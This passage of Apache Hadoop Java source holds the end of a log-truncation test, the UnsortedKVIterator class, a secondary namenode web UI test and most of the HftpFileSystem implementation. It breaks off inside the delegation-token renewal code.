TaskAttemptID attempt2 = new TaskAttemptID(baseTaskID, attemptsCount++);
Task task2 = null;
// Let attempt2 also write some logs
writeRealChars(attempt1, attempt2, LogName.SYSLOG, 100, 'B');
// Start yet another attempt in the same JVM
TaskAttemptID attempt3 = new TaskAttemptID(baseTaskID, attemptsCount++);
Task task3 = null;
// Let attempt3 also write some logs
writeRealChars(attempt1, attempt3, LogName.SYSLOG, 225, 'C');
// Finish the JVM.
JVMInfo jvmInfo = new JVMInfo(attemptDir,
Arrays.asList((new Task[] { task1, task2, task3 })));
trunc.truncateLogs(jvmInfo);
// The log-file should now be truncated.
assertTrue(attemptDir.exists());
File logFile = TaskLog.getTaskLogFile(attempt1, false, LogName.SYSLOG);
assertEquals(400 + (2 * truncatedMsgSize), logFile.length());
// The index files should also be proper.
assertEquals(150 + truncatedMsgSize, getAllLogsFileLengths(attempt1, false)
.get(LogName.SYSLOG).longValue());
assertEquals(100, getAllLogsFileLengths(attempt2, false)
.get(LogName.SYSLOG).longValue());
assertEquals(150 + truncatedMsgSize, getAllLogsFileLengths(attempt3, false)
.get(LogName.SYSLOG).longValue());
// assert data for attempt1
String syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attempt1, false);
assertTrue(syslog.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
String truncatedLog = syslog.substring(truncatedMsgSize);
for (int i = 0 ; i < 150; i++) {
assertEquals("Truncation didn't happen properly. At "
+ (i + 1) + "th byte, expected 'A' but found "
+ truncatedLog.charAt(i), 'A', truncatedLog.charAt(i));
}
// assert data for attempt2
syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attempt2, false);
for (int i = 0 ; i < 100; i++) {
assertEquals("Truncation didn't happen properly. At "
+ (i + 1) + "th byte, expected 'B' but found "
+ truncatedLog.charAt(i), 'B', syslog.charAt(i));
}
// assert data for attempt3
syslog = TestMiniMRMapRedDebugScript.readTaskLog(LogName.SYSLOG,
attempt3, false);
assertTrue(syslog.startsWith(TaskLogsTruncater.TRUNCATED_MSG));
truncatedLog = syslog.substring(truncatedMsgSize);
for (int i = 0 ; i < 150; i++) {
assertEquals("Truncation didn't happen properly. At "
+ (i + 1) + "th byte, expected 'C' but found "
+ truncatedLog.charAt(i), 'C', truncatedLog.charAt(i));
}
trunc.truncateLogs(jvmInfo);
// First and third attempts' logs are only truncated, so include 2*length of
// TRUNCATED_MSG header
assertEquals(400 + 2 * truncatedMsgSize, logFile.length());
}
private static String TEST_ROOT_DIR =
new File(System.getProperty("test.build.data", "/tmp")).toURI().toString().replace(
' ', '+');
private static String STDERR_LOG = "stderr log";
public static class LoggingMapper<K, V> extends IdentityMapper<K, V> {
public void map(K key, V val, OutputCollector<K, V> output,
Reporter reporter) throws IOException {
// Write lots of logs
for (int i = 0; i < 1000; i++) {
System.out.println("Lots of logs! Lots of logs! "
+ "Waiting to be truncated! Lots of logs!");
}
// write some log into stderr
System.err.println(STDERR_LOG);
super.map(key, val, output, reporter);
}
}
/**
* Test logs monitoring with {@link MiniMRCluster}
*
* @throws IOException
*/
@Test
@Ignore // Trunction is now done in the Child JVM, because the TaskTracker
// no longer has write access to the user log dir. MiniMRCluster
// needs to be modified to put the config params set here in a config
// on the Child's classpath
public void testLogsMonitoringWithMiniMR() throws IOException {
MiniMRCluster mr = null;
try {
final long LSIZE = 10000L;
JobConf clusterConf = new JobConf();
clusterConf.setLong(TaskLogsTruncater.MAP_USERLOG_RETAIN_SIZE, LSIZE);
clusterConf.setLong(TaskLogsTruncater.REDUCE_USERLOG_RETAIN_SIZE, LSIZE);
mr = new MiniMRCluster(1, "file:///", 3, null, null, clusterConf);
JobConf conf = mr.createJobConf();
Path inDir = new Path(TEST_ROOT_DIR + "/input");
Path outDir = new Path(TEST_ROOT_DIR + "/output");
FileSystem fs = FileSystem.get(conf);
if (fs.exists(outDir)) {
fs.delete(outDir, true);
}
if (!fs.exists(inDir)) {
fs.mkdirs(inDir);
}
String input = "The quick brown fox jumped over the lazy dog";
DataOutputStream file = fs.create(new Path(inDir, "part-0"));
file.writeBytes(input);
file.close();
conf.setInputFormat(TextInputFormat.class);
conf.setOutputKeyClass(LongWritable.class);
conf.setOutputValueClass(Text.class);
FileInputFormat.setInputPaths(conf, inDir);
FileOutputFormat.setOutputPath(conf, outDir);
conf.setNumMapTasks(1);
conf.setNumReduceTasks(0);
conf.setMapperClass(LoggingMapper.class);
RunningJob job = JobClient.runJob(conf);
assertTrue(job.getJobState() == JobStatus.SUCCEEDED);
long maxLength = 10000 + truncatedMsgSize;
// Log truncation may happen a few seconds after job completion, since the
// JVM may not exit until sleepTimeBeforeSigKill has expired. Only once
// the JVM has exited will the logs be truncated. Loop here to give
// it a chance to do truncation.
boolean truncated = false;
long stopLoopingTime = System.currentTimeMillis() + 20000;
while (!truncated) {
boolean expired = System.currentTimeMillis() > stopLoopingTime;
for (TaskCompletionEvent tce : job.getTaskCompletionEvents(0)) {
long length =
TaskLog.getTaskLogFile(tce.getTaskAttemptId(), false,
TaskLog.LogName.STDOUT).length();
truncated = length <= maxLength;
if (!truncated && expired) {
fail("STDOUT log file length for " + tce.getTaskAttemptId()
+ " is " + length + " and not <=" + maxLength);
}
if (tce.isMap) {
String stderr = TestMiniMRMapRedDebugScript.readTaskLog(
LogName.STDERR, tce.getTaskAttemptId(), false);
System.out.println("STDERR log:" + stderr);
assertTrue(stderr.equals(STDERR_LOG));
}
}
try {
Thread.sleep(1000);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
} finally {
if (mr != null) {
mr.shutdown();
}
}
}
/**
* Test the truncation of DEBUGOUT file by {@link TaskLogsTruncater}
* @throws IOException
*/
@Test
@Ignore // Trunction is now done in the Child JVM, because the TaskTracker
// no longer has write access to the user log dir. MiniMRCluster
// needs to be modified to put the config params set here in a config
// on the Child's classpath
public void testDebugLogsTruncationWithMiniMR() throws IOException {
MiniMRCluster mr = null;
try {
final long LSIZE = 10000L;
JobConf clusterConf = new JobConf();
clusterConf.setLong(TaskLogsTruncater.MAP_USERLOG_RETAIN_SIZE, LSIZE);
clusterConf.setLong(TaskLogsTruncater.REDUCE_USERLOG_RETAIN_SIZE, LSIZE);
mr = new MiniMRCluster(1, "file:///", 3, null, null, clusterConf);
JobConf conf = mr.createJobConf();
Path inDir = new Path(TEST_ROOT_DIR + "/input");
Path outDir = new Path(TEST_ROOT_DIR + "/output");
FileSystem fs = FileSystem.get(conf);
if (fs.exists(outDir)) {
fs.delete(outDir, true);
}
if (!fs.exists(inDir)) {
fs.mkdirs(inDir);
}
String input = "The quick brown fox jumped over the lazy dog";
DataOutputStream file = fs.create(new Path(inDir, "part-0"));
file.writeBytes(input);
file.close();
conf.setInputFormat(TextInputFormat.class);
conf.setOutputKeyClass(LongWritable.class);
conf.setOutputValueClass(Text.class);
FileInputFormat.setInputPaths(conf, inDir);
FileOutputFormat.setOutputPath(conf, outDir);
conf.setNumMapTasks(1);
conf.setMaxMapAttempts(1);
conf.setNumReduceTasks(0);
conf.setMapperClass(TestMiniMRMapRedDebugScript.MapClass.class);
// copy debug script to cache from local file system.
Path scriptPath = new Path(TEST_ROOT_DIR, "debug-script.txt");
String debugScriptContent =
"for ((i=0;i<1000;i++)); " + "do "
+ "echo \"Lots of logs! Lots of logs! "
+ "Waiting to be truncated! Lots of logs!\";" + "done";
DataOutputStream scriptFile = fs.create(scriptPath);
scriptFile.writeBytes(debugScriptContent);
scriptFile.close();
new File(scriptPath.toUri().getPath()).setExecutable(true);
URI uri = scriptPath.toUri();
DistributedCache.createSymlink(conf);
DistributedCache.addCacheFile(uri, conf);
conf.setMapDebugScript(scriptPath.toUri().getPath());
RunningJob job = null;
try {
JobClient jc = new JobClient(conf);
job = jc.submitJob(conf);
try {
jc.monitorAndPrintJob(conf, job);
} catch (InterruptedException e) {
//
}
} catch (IOException ioe) {
} finally{
long maxLength = 10000 + truncatedMsgSize;
boolean truncated = false;
long stopLoopingTime = System.currentTimeMillis() + 20000;
while (!truncated) {
boolean expired = System.currentTimeMillis() > stopLoopingTime;
for (TaskCompletionEvent tce : job.getTaskCompletionEvents(0)) {
File debugOutFile =
TaskLog.getTaskLogFile(tce.getTaskAttemptId(), false,
TaskLog.LogName.DEBUGOUT);
assertTrue("DEBUGOUT log file for " + tce.getTaskAttemptId() +
" should exist", !expired || debugOutFile.exists());
if (debugOutFile.exists()) {
long length = debugOutFile.length();
truncated = length == maxLength;
assertTrue("DEBUGOUT log file length for " + tce.getTaskAttemptId()
+ " is " + length + " and not " + maxLength,
truncated || !expired);
}
}
try {
Thread.sleep(1000);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
}
} finally {
if (mr != null) {
mr.shutdown();
}
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/UnsortedKVIterator.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.IOException;
import java.util.Collections;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.util.Progress;
import org.apache.hadoop.util.Progressable;
public class UnsortedKVIterator<K extends Object, V extends Object> implements RawKeyValueIterator
{
private static final Log LOG = LogFactory.getLog(UnsortedKVIterator.class);
// fields
private Configuration conf;
private FileSystem fs;
private CompressionCodec codec;
private List<Segment<K, V>> segments = null;
private Progressable reporter;
private Progress mergeProgress = new Progress();
// context
private long totalBytesProcessed = 0;
private float progPerByte;
private DataInputBuffer key;
private DataInputBuffer value;
private Segment<K, V> currentSegment = null;
private int current = 0;
private Counters.Counter readsCounter = null;
public UnsortedKVIterator(Configuration conf, FileSystem fs, List<Segment<K, V>> segments,
Progressable reporter, boolean sortSegments)
{
this.conf = conf;
this.fs = fs;
this.segments = segments;
this.reporter = reporter;
if (sortSegments)
{
Collections.sort(segments);
}
}
public UnsortedKVIterator(Configuration conf, FileSystem fs, List<Segment<K, V>> segments,
Progressable reporter, boolean sortSegments, CompressionCodec codec)
{
this(conf, fs, segments, reporter, sortSegments);
this.codec = codec;
}
public RawKeyValueIterator merge(Counters.Counter readsCounter, Counters.Counter writesCounter,
Progress mergePhase) throws IOException
{
LOG.info("Feeding " + segments.size() + " unsorted segments to reduce");
if (mergePhase != null)
{
mergeProgress = mergePhase;
}
this.readsCounter = readsCounter;
long totalBytes = computeBytesInMerges();
if (totalBytes != 0)
{
progPerByte = 1.0f / (float) totalBytes;
}
return this;
}
private long computeBytesInMerges()
{
long result = 0;
for (Segment<K, V> seg : segments)
{
result += seg.getLength();
}
return result;
}
@Override
public void close() throws IOException
{
// do nothing.
}
@Override
public DataInputBuffer getKey() throws IOException
{
return key;
}
@Override
public DataInputBuffer getValue() throws IOException
{
return value;
}
@Override
public Progress getProgress()
{
return mergeProgress;
}
@Override
public boolean next() throws IOException
{
if (current >= segments.size())
return false;
if (currentSegment == null)
{
currentSegment = segments.get(current);
currentSegment.init(readsCounter);
}
long startPos = currentSegment.getPosition();
boolean hasNext = currentSegment.nextRawKey();
long endPos = currentSegment.getPosition();
totalBytesProcessed += endPos - startPos;
if (!hasNext)
{
currentSegment.close();
current++;
currentSegment = null;
return next();
}
startPos = currentSegment.getPosition();
key = currentSegment.getKey();
value = currentSegment.getValue();
endPos = currentSegment.getPosition();
totalBytesProcessed += endPos - startPos;
mergeProgress.set(totalBytesProcessed * progPerByte);
return true;
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/namenode/TestSecondaryWebUi.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import static org.junit.Assert.*;
import java.io.IOException;
import java.net.URL;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.DFSConfigKeys;
import org.apache.hadoop.hdfs.DFSTestUtil;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.junit.Test;
public class TestSecondaryWebUi {
@SuppressWarnings("deprecation")
@Test
public void testSecondaryWebUi() throws IOException {
Configuration conf = new Configuration();
conf.set(DFSConfigKeys.DFS_NAMENODE_SECONDARY_HTTP_ADDRESS_KEY,
"0.0.0.0:0");
MiniDFSCluster cluster = null;
SecondaryNameNode snn = null;
try {
cluster = new MiniDFSCluster(conf, 0, true, null);
cluster.waitActive();
snn = new SecondaryNameNode(conf);
String pageContents = DFSTestUtil.urlGet(new URL("http://localhost:" +
SecondaryNameNode.getHttpAddress(conf).getPort() + "/status.jsp"));
assertTrue(pageContents.contains("Last Checkpoint Time"));
} finally {
if (cluster != null) {
cluster.shutdown();
}
if (snn != null) {
snn.shutdown();
}
}
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/HftpFileSystem.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.InputStream;
import java.lang.ref.WeakReference;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.security.PrivilegedExceptionAction;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.TimeZone;
import java.util.concurrent.DelayQueue;
import java.util.concurrent.Delayed;
import java.util.concurrent.TimeUnit;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.ContentSummary;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileChecksum;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.MD5MD5CRC32FileChecksum;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.hdfs.security.token.delegation.DelegationTokenIdentifier;
import org.apache.hadoop.hdfs.server.namenode.JspHelper;
import org.apache.hadoop.hdfs.server.namenode.NameNode;
import org.apache.hadoop.hdfs.tools.DelegationTokenFetcher;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.ipc.RemoteException;
import org.apache.hadoop.net.NetUtils;
import org.apache.hadoop.security.Credentials;
import org.apache.hadoop.security.SecurityUtil;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.security.token.Token;
import org.apache.hadoop.security.token.TokenIdentifier;
import org.apache.hadoop.util.Progressable;
import org.apache.hadoop.util.ServletUtil;
import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;
import org.xml.sax.helpers.XMLReaderFactory;
import org.apache.hadoop.hdfs.ByteRangeInputStream;
/** An implementation of a protocol for accessing filesystems over HTTP.
* The following implementation provides a limited, read-only interface
* to a filesystem over HTTP.
* @see org.apache.hadoop.hdfs.server.namenode.ListPathsServlet
* @see org.apache.hadoop.hdfs.server.namenode.FileDataServlet
*/
public class HftpFileSystem extends FileSystem {
static {
HttpURLConnection.setFollowRedirects(true);
}
private static final int DEFAULT_PORT = 50470;
protected InetSocketAddress nnAddr;
protected UserGroupInformation ugi;
private String nnHttpUrl;
private URI hdfsURI;
public static final String HFTP_TIMEZONE = "UTC";
public static final String HFTP_DATE_FORMAT = "yyyy-MM-dd'T'HH:mm:ssZ";
private Token<DelegationTokenIdentifier> delegationToken;
public static final String HFTP_SERVICE_NAME_KEY = "hdfs.service.host_";
public static final SimpleDateFormat getDateFormat() {
final SimpleDateFormat df = new SimpleDateFormat(HFTP_DATE_FORMAT);
df.setTimeZone(TimeZone.getTimeZone(HFTP_TIMEZONE));
return df;
}
protected static final ThreadLocal<SimpleDateFormat> df =
new ThreadLocal<SimpleDateFormat>() {
protected SimpleDateFormat initialValue() {
return getDateFormat();
}
};
@Override
protected int getDefaultPort() {
return DEFAULT_PORT;
}
@Override
public String getCanonicalServiceName() {
return SecurityUtil.buildDTServiceName(hdfsURI, getDefaultPort());
}
@SuppressWarnings("unchecked")
@Override
public void initialize(final URI name, final Configuration conf)
throws IOException {
super.initialize(name, conf);
setConf(conf);
this.ugi = UserGroupInformation.getCurrentUser();
nnAddr = NetUtils.createSocketAddr(name.toString());
StringBuilder sb = new StringBuilder("https://");
sb.append(NetUtils.normalizeHostName(name.getHost()));
sb.append(":");
sb.append(conf.getInt("dfs.https.port", DEFAULT_PORT));
nnHttpUrl = sb.toString();
String key = HftpFileSystem.HFTP_SERVICE_NAME_KEY+
SecurityUtil.buildDTServiceName(name, DEFAULT_PORT);
LOG.debug("Trying to find DT for " + name + " using key=" + key +
"; conf=" + conf.get(key, ""));
String nnServiceName = conf.get(key);
int nnPort = NameNode.DEFAULT_PORT;
if (nnServiceName != null) {
nnPort = NetUtils.createSocketAddr(nnServiceName,
NameNode.DEFAULT_PORT).getPort();
}
sb = new StringBuilder("hdfs://");
sb.append(nnAddr.getHostName());
sb.append(":");
sb.append(nnPort);
try {
hdfsURI = new URI(sb.toString());
} catch (URISyntaxException ue) {
throw new IOException("bad uri for hdfs", ue);
}
if (UserGroupInformation.isSecurityEnabled()) {
//try finding a token for this namenode (esp applicable for tasks
//using hftp). If there exists one, just set the delegationField
String canonicalName = getCanonicalServiceName();
for (Token<? extends TokenIdentifier> t : ugi.getTokens()) {
if (DelegationTokenIdentifier.HDFS_DELEGATION_KIND.equals(t.getKind())&
t.getService().toString().equals(canonicalName)) {
LOG.debug("Found existing DT for " + name);
delegationToken = (Token<DelegationTokenIdentifier>) t;
break;
}
}
//since we don't already have a token, go get one over https
if (delegationToken == null) {
delegationToken =
(Token<DelegationTokenIdentifier>) getDelegationToken(null);
renewer.addTokenToRenew(this);
}
}
}
@Override
public synchronized Token<?> getDelegationToken(final String renewer) throws IOException {
try {
//Renew TGT if needed
ugi.checkTGTAndReloginFromKeytab();
return ugi.doAs(new PrivilegedExceptionAction<Token<?>>() {
public Token<?> run() throws IOException {
Credentials c;
try {
c = DelegationTokenFetcher.getDTfromRemote(nnHttpUrl, renewer);
} catch (Exception e) {
LOG.info("Couldn't get a delegation token from " + nnHttpUrl +
" using https.");
LOG.debug("error was ", e);
//Maybe the server is in unsecure mode (that's bad but okay)
return null;
}
for (Token<? extends TokenIdentifier> t : c.getAllTokens()) {
LOG.debug("Got dt for " + getUri() + ";t.service="
+t.getService());
t.setService(new Text(getCanonicalServiceName()));
return t;
}
return null;
}
});
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
@Override
public URI getUri() {
try {
return new URI("hftp", null, nnAddr.getHostName(), nnAddr.getPort(),
null, null, null);
} catch (URISyntaxException e) {
return null;
}
}
/**
* ugi parameter for http connection
*
* @return user_shortname,group1,group2...
*/
private String getEncodedUgiParameter() {
StringBuilder ugiParamenter = new StringBuilder(
ServletUtil.encodeQueryValue(ugi.getShortUserName()));
for(String g: ugi.getGroupNames()) {
ugiParamenter.append(",");
ugiParamenter.append(ServletUtil.encodeQueryValue(g));
}
return ugiParamenter.toString();
}
/**
* Return a URL pointing to given path on the namenode.
*
* @param path to obtain the URL for
* @param query string to append to the path
* @return namenode URL referring to the given path
* @throws IOException on error constructing the URL
*/
URL getNamenodeURL(String path, String query) throws IOException {
final URL url = new URL("http", nnAddr.getHostName(),
nnAddr.getPort(), path + '?' + query);
if (LOG.isTraceEnabled()) {
LOG.trace("url=" + url);
}
return url;
}
/**
* Open an HTTP connection to the namenode to read file data and metadata.
* @param path The path component of the URL
* @param query The query component of the URL
*/
protected HttpURLConnection openConnection(String path, String query)
throws IOException {
query = addDelegationTokenParam(query);
final URL url = getNamenodeURL(path, query);
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestMethod("GET");
connection.connect();
return connection;
}
protected String addDelegationTokenParam(String query) throws IOException {
String tokenString = null;
if (UserGroupInformation.isSecurityEnabled()) {
synchronized (this) {
if (delegationToken != null) {
tokenString = delegationToken.encodeToUrlString();
return (query + JspHelper.getDelegationTokenUrlParam(tokenString));
}
}
}
return query;
}
@Override
public FSDataInputStream open(Path f, int buffersize) throws IOException {
String path = "/data" + ServletUtil.encodePath(f.toUri().getPath());
String query = addDelegationTokenParam("ugi=" + getEncodedUgiParameter());
URL u = getNamenodeURL(path, query);
return new FSDataInputStream(new ByteRangeInputStream(u));
}
/** Class to parse and store a listing reply from the server. */
class LsParser extends DefaultHandler {
ArrayList<FileStatus> fslist = new ArrayList<FileStatus>();
public void startElement(String ns, String localname, String qname,
Attributes attrs) throws SAXException {
if ("listing".equals(qname)) return;
if (!"file".equals(qname) && !"directory".equals(qname)) {
if (RemoteException.class.getSimpleName().equals(qname)) {
throw new SAXException(RemoteException.valueOf(attrs));
}
throw new SAXException("Unrecognized entry: " + qname);
}
long modif;
long atime = 0;
try {
final SimpleDateFormat ldf = df.get();
modif = ldf.parse(attrs.getValue("modified")).getTime();
String astr = attrs.getValue("accesstime");
if (astr != null) {
atime = ldf.parse(astr).getTime();
}
} catch (ParseException e) { throw new SAXException(e); }
FileStatus fs = "file".equals(qname)
? new FileStatus(
Long.valueOf(attrs.getValue("size")).longValue(), false,
Short.valueOf(attrs.getValue("replication")).shortValue(),
Long.valueOf(attrs.getValue("blocksize")).longValue(),
modif, atime, FsPermission.valueOf(attrs.getValue("permission")),
attrs.getValue("owner"), attrs.getValue("group"),
new Path(getUri().toString(), attrs.getValue("path"))
.makeQualified(HftpFileSystem.this))
: new FileStatus(0L, true, 0, 0L,
modif, atime, FsPermission.valueOf(attrs.getValue("permission")),
attrs.getValue("owner"), attrs.getValue("group"),
new Path(getUri().toString(), attrs.getValue("path"))
.makeQualified(HftpFileSystem.this));
fslist.add(fs);
}
private void fetchList(String path, boolean recur) throws IOException {
try {
XMLReader xr = XMLReaderFactory.createXMLReader();
xr.setContentHandler(this);
HttpURLConnection connection = openConnection(
"/listPaths" + ServletUtil.encodePath(path),
"ugi=" + getEncodedUgiParameter() + (recur ? "&recursive=yes" : ""));
InputStream resp = connection.getInputStream();
xr.parse(new InputSource(resp));
} catch(SAXException e) {
final Exception embedded = e.getException();
if (embedded != null && embedded instanceof IOException) {
throw (IOException)embedded;
}
throw new IOException("invalid xml directory content", e);
}
}
public FileStatus getFileStatus(Path f) throws IOException {
fetchList(f.toUri().getPath(), false);
if (fslist.size() == 0) {
throw new FileNotFoundException("File does not exist: " + f);
}
return fslist.get(0);
}
public FileStatus[] listStatus(Path f, boolean recur) throws IOException {
fetchList(f.toUri().getPath(), recur);
if (fslist.size() > 0 && (fslist.size() != 1 || fslist.get(0).isDir())) {
fslist.remove(0);
}
return fslist.toArray(new FileStatus[0]);
}
public FileStatus[] listStatus(Path f) throws IOException {
return listStatus(f, false);
}
}
@Override
public FileStatus[] listStatus(Path f) throws IOException {
LsParser lsparser = new LsParser();
return lsparser.listStatus(f);
}
@Override
public FileStatus getFileStatus(Path f) throws IOException {
LsParser lsparser = new LsParser();
return lsparser.getFileStatus(f);
}
private class ChecksumParser extends DefaultHandler {
private FileChecksum filechecksum;
/** {@inheritDoc} */
public void startElement(String ns, String localname, String qname,
Attributes attrs) throws SAXException {
if (!MD5MD5CRC32FileChecksum.class.getName().equals(qname)) {
if (RemoteException.class.getSimpleName().equals(qname)) {
throw new SAXException(RemoteException.valueOf(attrs));
}
throw new SAXException("Unrecognized entry: " + qname);
}
filechecksum = MD5MD5CRC32FileChecksum.valueOf(attrs);
}
private FileChecksum getFileChecksum(String f) throws IOException {
final HttpURLConnection connection = openConnection(
"/fileChecksum" + ServletUtil.encodePath(f),
"ugi=" + getEncodedUgiParameter());
try {
final XMLReader xr = XMLReaderFactory.createXMLReader();
xr.setContentHandler(this);
xr.parse(new InputSource(connection.getInputStream()));
} catch(SAXException e) {
final Exception embedded = e.getException();
if (embedded != null && embedded instanceof IOException) {
throw (IOException)embedded;
}
throw new IOException("invalid xml directory content", e);
} finally {
connection.disconnect();
}
return filechecksum;
}
}
/** {@inheritDoc} */
public FileChecksum getFileChecksum(Path f) throws IOException {
final String s = makeQualified(f).toUri().getPath();
return new ChecksumParser().getFileChecksum(s);
}
@Override
public Path getWorkingDirectory() {
return new Path("/").makeQualified(this);
}
@Override
public void setWorkingDirectory(Path f) { }
/** This optional operation is not yet supported. */
public FSDataOutputStream append(Path f, int bufferSize,
Progressable progress) throws IOException {
throw new IOException("Not supported");
}
@Override
public FSDataOutputStream create(Path f, FsPermission permission,
boolean overwrite, int bufferSize,
short replication, long blockSize,
Progressable progress) throws IOException {
throw new IOException("Not supported");
}
@Override
public boolean rename(Path src, Path dst) throws IOException {
throw new IOException("Not supported");
}
@Override
/*
* @deprecated Use delete(path, boolean)
*/
@Deprecated
public boolean delete(Path f) throws IOException {
throw new IOException("Not supported");
}
@Override
public boolean delete(Path f, boolean recursive) throws IOException {
throw new IOException("Not supported");
}
@Override
public boolean mkdirs(Path f, FsPermission permission) throws IOException {
throw new IOException("Not supported");
}
/**
* A parser for parsing {@link ContentSummary} xml.
*/
private class ContentSummaryParser extends DefaultHandler {
private ContentSummary contentsummary;
/** {@inheritDoc} */
public void startElement(String ns, String localname, String qname,
Attributes attrs) throws SAXException {
if (!ContentSummary.class.getName().equals(qname)) {
if (RemoteException.class.getSimpleName().equals(qname)) {
throw new SAXException(RemoteException.valueOf(attrs));
}
throw new SAXException("Unrecognized entry: " + qname);
}
contentsummary = toContentSummary(attrs);
}
/**
* Connect to the name node and get content summary.
* @param path The path
* @return The content summary for the path.
* @throws IOException
*/
private ContentSummary getContentSummary(String path) throws IOException {
final HttpURLConnection connection = openConnection(
"/contentSummary" + ServletUtil.encodePath(path),
"ugi=" + getEncodedUgiParameter());
InputStream in = null;
try {
in = connection.getInputStream();
final XMLReader xr = XMLReaderFactory.createXMLReader();
xr.setContentHandler(this);
xr.parse(new InputSource(in));
} catch(FileNotFoundException fnfe) {
//the server may not support getContentSummary
return null;
} catch(SAXException saxe) {
final Exception embedded = saxe.getException();
if (embedded != null && embedded instanceof IOException) {
throw (IOException)embedded;
}
throw new IOException("Invalid xml format", saxe);
} finally {
if (in != null) {
in.close();
}
connection.disconnect();
}
return contentsummary;
}
}
/** Return the object represented in the attributes. */
private static ContentSummary toContentSummary(Attributes attrs
) throws SAXException {
final String length = attrs.getValue("length");
final String fileCount = attrs.getValue("fileCount");
final String directoryCount = attrs.getValue("directoryCount");
final String quota = attrs.getValue("quota");
final String spaceConsumed = attrs.getValue("spaceConsumed");
final String spaceQuota = attrs.getValue("spaceQuota");
if (length == null
|| fileCount == null
|| directoryCount == null
|| quota == null
|| spaceConsumed == null
|| spaceQuota == null) {
return null;
}
try {
return new ContentSummary(
Long.parseLong(length),
Long.parseLong(fileCount),
Long.parseLong(directoryCount),
Long.parseLong(quota),
Long.parseLong(spaceConsumed),
Long.parseLong(spaceQuota));
} catch(Exception e) {
throw new SAXException("Invalid attributes: length=" + length
+ ", fileCount=" + fileCount
+ ", directoryCount=" + directoryCount
+ ", quota=" + quota
+ ", spaceConsumed=" + spaceConsumed
+ ", spaceQuota=" + spaceQuota, e);
}
}
/** {@inheritDoc} */
public ContentSummary getContentSummary(Path f) throws IOException {
final String s = makeQualified(f).toUri().getPath();
final ContentSummary cs = new ContentSummaryParser().getContentSummary(s);
return cs != null? cs: super.getContentSummary(f);
}
/**
* An action that will renew and replace the hftp file system's delegation
* tokens automatically.
*/
private static class RenewAction implements Delayed {
// when should the renew happen
private long timestamp;
// a weak reference to the file system so that it can be garbage collected
private final WeakReference<HftpFileSystem> weakFs;
RenewAction(long timestamp, HftpFileSystem fs) {
this.timestamp = timestamp;
this.weakFs = new WeakReference<HftpFileSystem>(fs);
}
/**
* Get the delay until this event should happen.
*/
@Override
public long getDelay(TimeUnit unit) {
long millisLeft = timestamp - System.currentTimeMillis();
return unit.convert(millisLeft, TimeUnit.MILLISECONDS);
}
/**
* Compare two events in the same queue.
*/
@Override
public int compareTo(Delayed o) {
if (o.getClass() != RenewAction.class) {
throw new IllegalArgumentException("Illegal comparision to non-RenewAction");
}
RenewAction other = (RenewAction) o;
return timestamp < other.timestamp ? -1 :
(timestamp == other.timestamp ? 0 : 1);
}
/**
* Set a new time for the renewal. Can only be called when the action
* is not in the queue.
* @param newTime the new time
*/
public void setNewTime(long newTime) {
timestamp = newTime;
}
/**
* Renew or replace the delegation token for this file system.
* @return
* @throws IOException
*/
@SuppressWarnings("unchecked")
public boolean renew() throws IOException, InterruptedException {
final HftpFileSystem fs = weakFs.get();
if (fs != null) {
synchronized (fs) {
fs.ugi.checkTGTAndReloginFromKeytab();
fs.ugi.doAs(new PrivilegedExceptionAction<Void>() {
@Override
public Void run() throws Exception {
try {
DelegationTokenFetcher.renewDelegationToken(fs.nnHttpUrl,
fs.delegationToken);
